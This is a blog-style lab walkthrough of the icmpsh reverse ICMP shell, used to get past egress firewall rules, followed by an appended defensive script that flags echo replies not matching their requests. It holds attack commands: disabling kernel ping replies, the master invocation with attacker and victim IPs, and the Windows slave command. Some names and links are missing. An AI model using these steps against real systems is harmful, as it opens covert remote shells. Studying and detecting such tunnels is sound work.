Reverse icmp_shell


A very old technique, but still worth learning.

Brief introduction to how the ICMP protocol works

Internet Control Message Protocol (ICMP) is part of the Internet protocol suite. Network equipment, including routers, uses it to send error messages and operational information, for example to indicate that a requested service is unavailable or that a host or route is unreachable. The ping command works at the third layer, the network layer, and carries its message in the ICMP payload. The packet is encapsulated with an IP header. Due to MTU limitations, the size of ICMP packets cannot be greater than 1500 bytes.

ICMP packets in the network layer

The ping command sends an ICMP echo request to the target host. If the target host replies with an echo response, the host is alive.

Scene introduction

Sometimes network administrators deploy a variety of firewalls, which makes penetration testing very difficult. One such setup is a firewall that allows traffic from known machines on specific ports and services (ingress filtering) and also has strict egress access control list settings.

Suppose you already own a machine on the internal network or in part of the DMZ. A reverse shell cannot be obtained over TCP, and a bind shell is not considered either.

However, regarding UDP, a DNS tunnel or an ICMP channel is usually used to obtain a reverse shell. ICMP is the focus of this tool. icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX-compatible master written in C ( icmpsh-mc ), Perl ( ) or Python ( ).

Its main advantage over other similar open source tools is that it does not require administrator rights to run on the target machine. The tool is simple, convenient and portable (cross-platform).

The tool is mainly aimed at Windows and uses a client/server architecture: the slave (client) is written in C and can only run on Windows, while the master (server) is cross-platform, and the author has ported it from C and Perl to Python.

For detailed usage, please refer to:

Local experiment



First, on the victim's machine, I set up an outbound firewall rule with protocol type TCP and port 6060.

We use python2.7 on kali to start a server running on port 6060.

The Apache server is running on port 80.

Local access

Then use the target machine to access the designated port to test whether the outbound rule works as expected.

When no port is specified, the default port 80 is accessed.

This is only to verify that, when the server has an egress access control list configured, a reverse ICMP shell can still be completed over the ICMP protocol.


Use the first command to turn off the ping reply; this prevents the kernel from responding to the ping packets itself, and only use the attacker

sysctl -w net.ipv4.icmp_echo_ignore_all=1 > /dev/null
python 192.168.41.136 192.168.41.128
# python <attacker ip> <victim ip>

An error is reported here; read the py file.

Then, annoyingly, kali comes without pip. Reference

It is extremely slow, installing a package is extremely slow as well, and the new version of kali does not have vxxxy installed, so that has to be configured too, and so on.


icmpsh.exe -t -d 500 -b 30 -s 128


Execute whoami
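
From the defender's side, this channel stands out because a genuine echo reply returns exactly the data of the request (RFC 792), while a master that answers echo requests itself, which is why the kernel reply is disabled above, returns different data. The following check is an added example, not code from the original post or from icmpsh; the function names, the gateway address and the payloads are constructed for illustration.

```python
import struct

ECHO_REPLY, ECHO_REQUEST = 0, 8

def icmp_checksum(data: bytes) -> int:
    """RFC 1071 checksum; returns 0 when run over a valid ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Build an ICMP echo message (used only for the constructed sample)."""
    body = struct.pack("!HH", ident, seq) + payload
    csum = icmp_checksum(struct.pack("!BBH", icmp_type, 0, 0) + body)
    return struct.pack("!BBH", icmp_type, 0, csum) + body

def find_mismatched_replies(packets):
    """packets: (src_ip, dst_ip, icmp_bytes) tuples in capture order.
    Returns (requester, responder, id, seq) for each echo reply whose data
    is not the data of the request it answers."""
    pending, alerts = {}, []
    for src, dst, raw in packets:
        if len(raw) < 8 or raw[1] != 0 or icmp_checksum(raw) != 0:
            continue  # truncated, non-zero code or corrupt message: skip it
        icmp_type, _, _, ident, seq = struct.unpack("!BBHHH", raw[:8])
        if icmp_type == ECHO_REQUEST:
            pending[(src, dst, ident, seq)] = raw[8:]
        elif icmp_type == ECHO_REPLY:
            sent = pending.pop((dst, src, ident, seq), None)
            if sent is not None and sent != raw[8:]:
                alerts.append((dst, src, ident, seq))
    return alerts

# Constructed sample: addresses .128/.136 are the page's victim/attacker,
# the gateway address and all payloads are made up for illustration.
VICTIM, MASTER, GATEWAY = "192.168.41.128", "192.168.41.136", "192.168.41.1"
WIN_PING = b"abcdefghijklmnopqrstuvwabcdefghi"  # default Windows ping data
SAMPLE = [
    (VICTIM, GATEWAY, build_echo(ECHO_REQUEST, 1, 1, WIN_PING)),
    (GATEWAY, VICTIM, build_echo(ECHO_REPLY, 1, 1, WIN_PING)),
    (VICTIM, MASTER, build_echo(ECHO_REQUEST, 1, 2, b"C:\\>")),
    (MASTER, VICTIM, build_echo(ECHO_REPLY, 1, 2, b"whoami\n")),
]

if __name__ == "__main__":
    print(find_mismatched_replies(SAMPLE))
```

In a real deployment the tuples would come from a packet capture or sensor feed, and the same comparison works regardless of which tool produced the tunnel.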

